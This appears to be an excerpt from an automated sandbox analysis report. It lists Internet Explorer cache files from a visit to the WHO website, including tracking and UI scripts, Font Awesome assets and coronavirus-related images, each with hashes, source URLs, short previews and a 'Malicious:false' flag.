                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\176.b3b098a46f20d5583e41[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):1517
                                                                                                                                                                    Entropy (8bit):4.110829765636205
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:r4Ci+BsHyetW8NV1WXUSWkrqJfT4Aiu96WfLygeJKP56OWGZsfKMN:ETHyegM+ULfT4Ai66WfLyggKP8D
                                                                                                                                                                    MD5:4DFE77C8CEA3D79577D222E8384019F9
                                                                                                                                                                    SHA1:68B644A1B012359A978BF8171DB8DFB5B6148637
                                                                                                                                                                    SHA-256:1EA37CF08EAEA3302C373E600CCA593F353F037CB753C0214A9FC3949C10B6C6
                                                                                                                                                                    SHA-512:67906EF257FD483CFC47A0E5B3238C27373FD48A899B648985DB79A50F0A9DE9EAA8A61E2461A243D25549643E0BFB69106A2DE13068EA53433D1FA09B036B05
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://s7.addthis.com/static/176.b3b098a46f20d5583e41.js
                                                                                                                                                                    Preview: atwpjp([176],{281:function(c,a){c.exports='<svg width="32" height="32" xmlns="http://www.w3.org/2000/svg"><path d="M16.14 27a3.32 3.32 0 0 1-.17-.005 1.362 1.362 0 0 1-.11.005c-1.302 0-2.14-.63-2.948-1.24-.56-.42-1.086-.817-1.707-.927a5.176 5.176 0 0 0-.896-.08c-.526 0-.94.086-1.243.15-.183.037-.342.07-.463.07-.125 0-.262-.03-.32-.245a8.133 8.133 0 0 1-.126-.543c-.092-.45-.158-.728-.335-.757-2.067-.34-2.66-.804-2.79-1.133a.445.445 0 0 1-.033-.14.245.245 0 0 1 .195-.26c3.178-.557 4.603-4.017 4.662-4.164 0-.003.003-.007.005-.01.194-.42.232-.786.113-1.084-.218-.548-.93-.79-1.4-.948-.115-.038-.224-.075-.31-.11-.94-.397-1.018-.803-.98-1.01.062-.353.505-.6.862-.6.098 0 .185.02.258.056.422.21.803.318 1.132.318.454 0 .652-.204.676-.23-.01-.23-.026-.47-.04-.716-.095-1.6-.212-3.59.263-4.724 1.425-3.403 4.445-3.668 5.337-3.668l.39-.004h.054c.894 0 3.922.265 5.347 3.67.475 1.135.358 3.126.263 4.725l-.004.07c-.013.223-.026.44-.036.646.022.026.205.213.616.23.314-.013.673-.12 1.068-.316a.76.76 0 0 1
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\992x312-pag-coronavirus-2[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 492x312, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):35813
                                                                                                                                                                    Entropy (8bit):7.978445090692319
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:0r9bCMceSTYfhoZesWcaOFKpeXKDJhZJWBE95F2EyBtoOLHZckZ7OkK:0JbYeggCELXOFjK7ZJ995F2E8HZJZOkK
                                                                                                                                                                    MD5:DD94068BB6D8B2500E5026970AC14D17
                                                                                                                                                                    SHA1:C729CEE3005968C9DF0DF1DA3ECB108E91117FC3
                                                                                                                                                                    SHA-256:76ECDFB74830CE360BF11FA7BD533F14BD13B7B5AC7EA7B2123FAC7316FFB1C1
                                                                                                                                                                    SHA-512:7A3CAC8FD6C5DAEE4F432DC9812ABD1E9EA6FEF7AF7B88CCABE99FAD2C6600377077CBF8E24C260D96896D49789982B5DF4090489327C6F644E3869F6896E402
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/departments/child-health/992x312-pag-coronavirus-2.tmb-549v.jpg?Culture=en&sfvrsn=4da24492_7
                                                                                                                                                                    Preview: ......JFIF.....`.`......................................... $.' ",#..(7),01444.'9=82<.342...........2!.!22222222222222222222222222222222222222222222222222......8...."..................................................vS'X......}.....},.\...9..DNj..c...[.J{;.-$b.b[....E..J.J4...H.R...br5..k..)R.Ts....[.?.X..Y.Tg..9,....".i.VX.W...ED.............v._..vt"%..9...nW{h.....jw#^D.....&*.1&..Mnp...D..!..R...g.....N.j-.V#.b.(..y....u.rR.....5y..#a..C........R.e.<<4.. .2x .P..\..P.2.FX..G...,%DL....o,[.T.C.3.....9..W.....Ymu....YU.Z..C...].....T.e.D.F?d.m.+p.........IR.dkT.*.8f9.&:.k.....e..m..b^...F...g[|.{C.S@..fO.!s.E%..G.(T..#L`..2..&.i[<.G......U=..H-^*D......"`...wyY.\.c....fK...........}.........."../.,^......0>..2>..E. ...B F..M..6..J.m......u.S..l.v..e...Z...S./.....N.G.zf...h"/["(~...%.n|..I..@u....<`9......6+g1wh........Qa....6.Z.,[c.Sf...B..l.....09b.......Dd.!.F.a.....m-.7......qm.w....G.".3..y.f.........1b,......5...#..(I.3..X..a.9.!
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\992x312-pag-coronavirus-2[2].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 492x312, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):35813
                                                                                                                                                                    Entropy (8bit):7.978445090692319
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:0r9bCMceSTYfhoZesWcaOFKpeXKDJhZJWBE95F2EyBtoOLHZckZ7OkK:0JbYeggCELXOFjK7ZJ995F2E8HZJZOkK
                                                                                                                                                                    MD5:DD94068BB6D8B2500E5026970AC14D17
                                                                                                                                                                    SHA1:C729CEE3005968C9DF0DF1DA3ECB108E91117FC3
                                                                                                                                                                    SHA-256:76ECDFB74830CE360BF11FA7BD533F14BD13B7B5AC7EA7B2123FAC7316FFB1C1
                                                                                                                                                                    SHA-512:7A3CAC8FD6C5DAEE4F432DC9812ABD1E9EA6FEF7AF7B88CCABE99FAD2C6600377077CBF8E24C260D96896D49789982B5DF4090489327C6F644E3869F6896E402
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/departments/child-health/992x312-pag-coronavirus-2.tmb-768v.jpg?Culture=en&sfvrsn=4da24492_7
                                                                                                                                                                    Preview: ......JFIF.....`.`......................................... $.' ",#..(7),01444.'9=82<.342...........2!.!22222222222222222222222222222222222222222222222222......8...."..................................................vS'X......}.....},.\...9..DNj..c...[.J{;.-$b.b[....E..J.J4...H.R...br5..k..)R.Ts....[.?.X..Y.Tg..9,....".i.VX.W...ED.............v._..vt"%..9...nW{h.....jw#^D.....&*.1&..Mnp...D..!..R...g.....N.j-.V#.b.(..y....u.rR.....5y..#a..C........R.e.<<4.. .2x .P..\..P.2.FX..G...,%DL....o,[.T.C.3.....9..W.....Ymu....YU.Z..C...].....T.e.D.F?d.m.+p.........IR.dkT.*.8f9.&:.k.....e..m..b^...F...g[|.{C.S@..fO.!s.E%..G.(T..#L`..2..&.i[<.G......U=..H-^*D......"`...wyY.\.c....fK...........}.........."../.,^......0>..2>..E. ...B F..M..6..J.m......u.S..l.v..e...Z...S./.....N.G.zf...h"/["(~...%.n|..I..@u....<`9......6+g1wh........Qa....6.Z.,[c.Sf...B..l.....09b.......Dd.!.F.a.....m-.7......qm.w....G.".3..y.f.........1b,......5...#..(I.3..X..a.9.!
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\A-year-in-pictures--A-shared-commitment-to-change-the-course-of-the-pandemic_WHO-Bangladesh--TA-3[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 768x511, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):79855
                                                                                                                                                                    Entropy (8bit):7.987829633502392
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:qoimXNE8xjKN0wKof8gWYcvukJGaq/jXKzxMLx7UTjsEv56K2:zigNE8RKN0S4H6XKzIxke
                                                                                                                                                                    MD5:1094891E29ADE0E7819FB24E0B38C9DE
                                                                                                                                                                    SHA1:98120BE9DCA45D2984C7292E4668491B571315A5
                                                                                                                                                                    SHA-256:83868BCFF2C7B7E8BD92B00903E036E531C5BD0D9E4C9540FD540292E1559074
                                                                                                                                                                    SHA-512:D183E89805ADE487486E793C5B659B64B73C5D5E751794501FA96FBCDD0FA8BB5B42138E29F5723DAF797212940BBC2143E4AEBF34B11BD2DC05EF6581B525A1
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/searo---images/countries/bangladesh/cxb/a-year-in-pictures--a-shared-commitment-to-change-the-course-of-the-pandemic_who-bangladesh--ta-3.tmb-768v.jpg?sfvrsn=dbf025dd_1
                                                                                                                                                                    Preview: ......JFIF.............C..............................................!........."$".$.......C............................................................................"..............................................................................f%.<..!..tT...B+..,.}z<..E7 .Z.?.U..Yv...E...1'.......#.g...^F. ,w..sE.......]....w]HM..X.+...V...X-.....H.D.[.;5.|..7JA.!........x/...D..j...y..m..R...u.J....U}.....J...N7@.GvZ&.-...OA$.$.I&.I....X..L../J...n1.Z....}...\..j.?...E.y......j.<....e....#.f.v/..GU./.e5|.8.3...l.z..M.0^..( ..._...{%4].t.cNp[..dZ.....M..U9J..+.n.h..I..~.C.....6ejN.....f._.?.*+n....e.r..;...c....{..R{.....z..l.=.d..$.I&.9J..G|..?G.u..=..is:..yDR.=Dk..ru...h]..y.. ....'.a......ouxq4.6...p.|.....C.z.#..v.r....,.C..z.w.1G..f...v.-Ee....`...:N.\.i.._.r.:......'4...?v?..V...:.-.L...oz..V..:...t1p..^.;!.^...G......B.}.....$.m$.|.a7.b..h."|....$.u...T..4...3z.|/.:.i;...u....8..8..(b..C$b.....rxYB=F'....8.&7..>.>=%....sW.N.~......m.L..l
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\DSC_8725_s[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 549x359, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):37650
                                                                                                                                                                    Entropy (8bit):7.977424741385987
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:wqR/SR0WUnqF8vKftilrF02K3DdQXR8nF8PXD5rDwez6wSz:PStZF8ktil502KTdQXSnF4NA
                                                                                                                                                                    MD5:97018CA0651276A5DEB7EE3D9EDACE08
                                                                                                                                                                    SHA1:D557607F00257D9773BC44FC1900AC1123FE12CF
                                                                                                                                                                    SHA-256:27215C4AB8A98F8387188BAD3D596CB6F9ED8762FF043255E0C4A3003946CECC
                                                                                                                                                                    SHA-512:5DF0A1BB490D3D77FDF029B1D51ED972745CAB28D85202AE611ED273243B597B80881DB4389079C4C400C7519573CF426847FBEE4D191CEB7EC6C745EAC4CEA8
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/health-topics/coronavirus/dsc_8725_s.tmb-549v.jpg?Culture=en&sfvrsn=f688b931_6
                                                                                                                                                                    Preview: ......JFIF.............C..............................................!........."$".$.......C.......................................................................g.%.."..............................................................................d..Rg#KFE;A.Z.V..,.`....W".,.W.b.\......*.9.62..j.2..@.P&*..@X.....1..a``Zh...Y=E.@.....Br.h.+..&..i.q.Lzr!k2u.+.Nz.CV1_V.i...}.....s..Y..$.....+..8...Jd..Ap.nM..U....aoD....op..Z.=..[,w...AM...2..fM*yFD..,...H...uAi..A..U.Q...W.Q..{......K.t2M+I..N....+..i&`.N.f..Z...R...p.<..X.P..bR.....Q.R(..3k..].iu..2$..P.)..S..9...8.qhv..9R..e.0WDW..!......i......A...=fV..U.GR.)l.._f...N.B...!7.bL.X.o.[Fr..\.iB.g.D......l.=..d<..t.ZQ$4...*+a.h$...Z..l.\mN..E.g.....B.@-..."21^..N..v5..Ov.R......@X.H.jw.GNX.5..f...,..p..Dk.$.L.N.=.J.K.+..s....M..._;C.K.....c=kQ.W*.@dT.wSN...:..d.oev.F....r.#L-.dH^...I,@.^...s))V.K9.sV.gKDKU.T9s,...bZ.,...[D.L.N..R..>uJW.fx.hVdl$&.{K*q..Z..j.75S..}.^S?f.s........]r_U.......%.$V..r..'w,.
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\RS34669_Covax_Sticker_CMYK_Covax_5_Sqaure_CovaxColours[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 549x367, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):29217
                                                                                                                                                                    Entropy (8bit):7.95659159276415
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:1RRKw/eEYOGWJoDy//ZKrHvWZvFOz5hWniY:X5eEY3+Hg7OZv2LWJ
                                                                                                                                                                    MD5:46AFC101D01A5C37D2DAB4BDE1247598
                                                                                                                                                                    SHA1:9548F4C943D39503BBBAC107C36F47B2561108A1
                                                                                                                                                                    SHA-256:358BB9FE70555AE5F2135B522765948B3BA4F10A5805795DB725236BC0CA9E44
                                                                                                                                                                    SHA-512:F75693E5BFE2BECA06CA2B70DCD401B7DC5BFBBF1213BCE38BA27582FF44D11E89E514F40242934CD83FADF3C487C74711E612240854395FBBFF3F3320EAF801
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/searo---images/countries/sri-lanka/rs34669_covax_sticker_cmyk_covax_5_sqaure_covaxcolours.tmb-549v.jpg?Culture=en&sfvrsn=5b1bfc6f_6
                                                                                                                                                                    Preview: ......JFIF.............C..............................................!........."$".$.......C.......................................................................o.%.."..............................................................................D...........................................................F........y..P.....^.."..V.'.E.C......8.z..?...a..7......../4m..`..X.v..:...~_.TF.....t.V......N......z...&...P......{.C[rs.s...N.t..?UG-.ym....[.+9M6<#..*.Z^..V.~3e..CL.].(.....V#...[s.V.H.l.o..W..9o.......m.C.p.z,.o...j......|.Y.(........a...=3.iS6*..J...o.l.....zx.9.0......=...l%m'....=..~.\.&......n...>..j7l.u.....1}.v.n..G?UW....+...T...l<.0i...o9f...}w.t.....T..R..........P........r.....2......U.^.E.k~....V...?.ri...\.~....~6...[......O.>K..s.a.N.j...P...J...k..K.Z.C..G.b....Dc7.tk..F.A...|:e2..}p.t?.{]ou...*..K.o.....v.nr....k.4...d...:.g0..;x.pzy.J.....f}![.zi...9rj...Q5.&..m........j.0.."........m.....n...o.....W\4.6S...\..\Bj....tSM.
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\accordion-footer-list.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):2376
                                                                                                                                                                    Entropy (8bit):4.846958680640504
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:pggG75XMzPp8SWZS45dC7HT5nfSY4yZv4BWivVkXwbCclKGkLTrOlrOgp7xH8iFh:W8tgPY0yDukzMr/p7xHug
                                                                                                                                                                    MD5:39343D507CC893071356B23C99F57C11
                                                                                                                                                                    SHA1:B78A5DEDBF2DC50A94CE7FD5379D8477E4E87123
                                                                                                                                                                    SHA-256:951F1377A961CEBDFFE3B0CB329193499906F878D7DEF233D5F09E403699DD07
                                                                                                                                                                    SHA-512:A91FC1D4CAEB27861EEF1AA2BE7D62F6768FE00951A1387F1057BB3C3B5DCCBA6C90B73B4D8F5FAE0F23CDFD14FB32C5F6CF32DF1F62A88643C7A02076928C71
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/scripts/accordion-footer-list.min.js?v=12.1.7126.28741
                                                                                                                                                                    Preview: "use strict";!function(window){var accordion=null,activePanelClass="is-active",accordionPanels=null,currentPanel=null;function _activateSelectedPanel(evt){evt.preventDefault();var selectedPanel=function(el,cls){for(;(el=el.parentElement)&&!el.classList.contains(cls););return el}(evt.currentTarget,"sf-accordion-footer__panel");if(currentPanel===selectedPanel&&currentPanel.classList.contains(activePanelClass))return currentPanel=selectedPanel,void _removeCurrentPanel();_removeCurrentPanel(),function(selectedPanel){selectedPanel.classList.add(activePanelClass);var currentContent=selectedPanel.querySelector(".sub-level");currentContent.style.display="block",currentContent.style.height=currentContent.offsetHeight,currentContent.style.opacity=1,currentPanel=selectedPanel}(selectedPanel)}function _removeCurrentPanel(){if(void 0===currentPanel)return this;var currentContent=currentPanel.querySelector(".sub-level");currentContent.style.opacity=0,currentContent.style.display="none",currentPanel.
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\all[1].css
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):36599
                                                                                                                                                                    Entropy (8bit):4.744239554341881
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:W++rB31vxojTQ6m4TotMam317fKZII9kQCY/BGMI993BXMl3oPGEo/fA:a31vxoXQ6vWU9KJkdY/kME93KaFo/Y
                                                                                                                                                                    MD5:D1ACB8AD33B1526ACBFD3F0028B859B0
                                                                                                                                                                    SHA1:292F3E748A5536C0E9FDC3BEE02DBF89ADC80B1D
                                                                                                                                                                    SHA-256:CFAC6241DD3AABB5F1552C17501790093015C006A8E13671823C1FF4872BEAAE
                                                                                                                                                                    SHA-512:70A9A515B42605647162B451F59DF492CF147568484B987A40605A214138BC30CE01B143CF660433D7933F2B1E474652137717FDB05E1D8747DA1C31FF5EDC68
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://use.fontawesome.com/releases/v5.0.10/css/all.css
                                                                                                                                                                    Preview: /*!. * Font Awesome Free 5.0.10 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */..fa,.fab,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pull-left{fl
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\event[1].png
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:PNG image data, 131 x 131, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):5092
                                                                                                                                                                    Entropy (8bit):7.926179113262451
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:g7MAVls61jDxabyZHmgWvavgQ9bhr591E05GNYUuMAu4McVy1FI0cPbyEsY6gtIt:g9FjDtmH4gQ9bhrb1E/NYVMh4jVM60ce
                                                                                                                                                                    MD5:A262B3983C1769FF3D0A68A0101A8EA8
                                                                                                                                                                    SHA1:C3F8AF91B3C2A5DDF4C5C1FA47742DECD4E974D5
                                                                                                                                                                    SHA-256:F95B8033DDF4911D628A7A2D856B00FFF73D589D9885EE8CAB1A48C2D3B180EC
                                                                                                                                                                    SHA-512:C2AAEB823B3C4E1575D867B4C1CBCA051A916A32F2BAFD055B1A929F3E0C3AA39A9B71E2395778C3C95E3C7C343F729DCF5D95E7A02CA65846C7D9B0A059DCB3
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/fallback/icons/media-centre/event.tmb-131v.png?Culture=en&sfvrsn=c073cbae_12
                                                                                                                                                                    Preview: .PNG........IHDR................f....sRGB.........gAMA......a.....IDATx..].p..u.E.cKN&vb+....$.......if.q..i.'q..I&N..I:...k;M.i.[.....Q.E.G$.(..m.... H.... .. .:.........I............a....k...3...r^.....A/pZ..8@0.qSpB.p0p.`..........'..N...8.8q0p.`..........'..N...-.q......rw<?.....e..OL......NQ...j..n..e.}..._...v...e>s...........zQ.d..zXw.G.m..d+.W..8.mN.n..:`p.................o.MV.....d..&..Mv.h....L..L.....YrO5..&..d..*.F.Z.|...c2.....'.k......._.m.m.Gv8.......c...C.......2+d.Za.z.<X..+.|....ZA.3.[.{d..z...!....m...OT..$..-.)...v.,.gZ.A.o..b+.Yf%yl..X..J...z.`@..MZ\l..W..2...Y../..m...Hc...B......;d......[...\#..l;x.04.....|jK=h.....|..C2...~..<s.`.k..L..........ns.......w.m...]...2.....>....C.a..,...t+....w.?...g......A.w\.0<..).W.w......F}.rw.b0||..@....[...zn... |Z%0.n....44...........7.F..1........1....p...i....e0.s0.G..@r0d. .f.l...55.j{Fe..R....N.c]s..m...a]..z.K...M....i.3d...?>../T.%.i...o.;..hM.`.a.F.....B...pO..2...p'me-...D..w.
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\fa-solid-900[1].eot
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:Embedded OpenType (EOT), Font Awesome 5 Free family
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):115148
                                                                                                                                                                    Entropy (8bit):6.287293018741218
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:bbIqflGXeaiyefcq1VaOcPRdCJjX4XoxFIRuA7ZqhF1PwmLhrcR/2cv7s83RWt8A:bbI2Gfiyefcq1VaOcPRdC54XoxFIRuAw
                                                                                                                                                                    MD5:303DC0631C4578227EA986E8832D3AD3
                                                                                                                                                                    SHA1:1B8B0D1740CA205E74FCC10930179AAA7180FCCF
                                                                                                                                                                    SHA-256:500EF6619A645A0B54A6EAA11F77A71F67DA7A7E0C9B73F0E43E7337670D04B8
                                                                                                                                                                    SHA-512:A47615BD98835B639E310C830D4BE0714C062AB875FB35E47B6A487006C2D18D1AFE69EE3A1F770BF5034A70632AEA0676B324DBF969DF2C080A6CB4955E8C52
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://use.fontawesome.com/releases/v5.0.10/webfonts/fa-solid-900.eot?
                                                                                                                                                                    Preview: ..................................LP........................,.=p..................&.F.o.n.t. .A.w.e.s.o.m.e. .5. .F.r.e.e.....S.o.l.i.d.....V.e.r.s.i.o.n. .5...0...2.F.o.n.t. .A.w.e.s.o.m.e. .5. .F.r.e.e. .S.o.l.i.d................0GSUB .%z...8...TOS/2?.QH.......Vcmap..1....\..$~glyf......3...p,head.}&........6hhea.;.V.......$hmtx.'.........xloca.a}........>maxp.H......... name.......H....postB.T8...D................................................p=.,_.<............ ....... ............................. .............................0.>..DFLT..latn............................liga...........................................f...G...f....................................PfEd.@.............F.......................................................@...@...........@...@...........@...........................................................................................................................................@.......@...........................@...........................@..............
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\fetch-polyfill[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:Pascal source, ASCII text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):8543
                                                                                                                                                                    Entropy (8bit):5.238064281324506
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:oQHdiEslZc0rsNYNU5mSJHqI03aej6tZoaMLQO/x5/P80+HcW:ocHslLsP5muHqI0Jj6tZcUO/x5+V
                                                                                                                                                                    MD5:04E3CC8A9641B3F9F9C9370F4E9B5BDD
                                                                                                                                                                    SHA1:9602A891F583094BB04FD407B253ABCAFFB8C8D0
                                                                                                                                                                    SHA-256:DE6C4FFA2BD9FD283610E28D0DB2EC48607AAB39D213A51AEF248673A0A7E980
                                                                                                                                                                    SHA-512:58942BCC0F39D620A475B65C1AEB4F18872F68F22C89DEC076906A0DB8BC2B7CCA9357710A7824A0FA7404FF73F41013AECA34609CAACD2187414F7BD0D490D6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.youtube.com/s/player/9f1ab255/fetch-polyfill.vflset/fetch-polyfill.js
                                                                                                                                                                    Preview: /*.. Copyright (c) 2014-2016 GitHub, Inc... Permission is hereby granted, free of charge, to any person obtaining. a copy of this software and associated documentation files (the. "Software"), to deal in the Software without restriction, including. without limitation the rights to use, copy, modify, merge, publish,. distribute, sublicense, and/or sell copies of the Software, and to. permit persons to whom the Software is furnished to do so, subject to. the following conditions:.. The above copyright notice and this permission notice shall be. included in all copies or substantial portions of the Software... THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,. EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF. MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND. NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE. LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION. OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\gtm[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):113078
                                                                                                                                                                    Entropy (8bit):5.529080047662171
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:KNu9KdnqpMXbOlh0E+HG++/HRE6cszuzKZQa8PrpO+01W9nKP9CouwqDBmusHyVx:KNu9yqpMruh07+5ssGa8Po++C3+y1Ie7
                                                                                                                                                                    MD5:B0A1F51883DFECEF5093A536714A7B44
                                                                                                                                                                    SHA1:EEFAE2A7AF69B58797F48D01A377270F842C131D
                                                                                                                                                                    SHA-256:A0CDF300DA78BD35E03EBF7466E92C4F0F5A6D4655E17C0782E14B4469B7FA72
                                                                                                                                                                    SHA-512:B3F3CD3E9DC88FD6CBC9481863C3E476B22E279C5F9553F8DA8E9E04319B6A575F58332D5BFC04FFE6AD7AF4F148CFCE22FBC3225DD45F668BD23D74CF22C1F9
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.googletagmanager.com/gtm.js?id=GTM-5QFSQRT
                                                                                                                                                                    Preview: .// Copyright 2012 Google Inc. All rights reserved..(function(w,g){w[g]=w[g]||{};w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');(function(){..var data = {."resource": {. "version":"69",. . "macros":[{. "function":"__e". },{. "function":"__c",. "vtp_value":"GTM-P9P822R". },{. "function":"__jsm",. "vtp_javascript":["template","(function(){return document\u0026\u0026document.documentElement\u0026\u0026document.documentElement.lang?document.documentElement.lang:\"undefined\"})();"]. },{. "function":"__gas",. "vtp_cookieDomain":"auto",. "vtp_doubleClick":false,. "vtp_setTrackerName":false,. "vtp_useDebugVersion":false,. "vtp_useHashAutoLink":false,. "vtp_decorateFormsAutoLink":false,. "vtp_enableLinkId":false,. "vtp_dimension":["list",["map","index","2","dimension",["macro",2]]],. "vtp_enableEcommerce":false,. "vtp_trackingId":"UA-30222631-2",. "vtp_enableRecaptchaOption":fa
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\maxresdefault[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1280x720, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):87871
                                                                                                                                                                    Entropy (8bit):7.967204511872682
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:AR2rBLaCDNkn2Pr5ht3FUDE1wOTBcnUo4bbhkxURFMEks1sNRapgVeTU:jBGN2HlFaE15Vc/4bbhlR2xNspQx
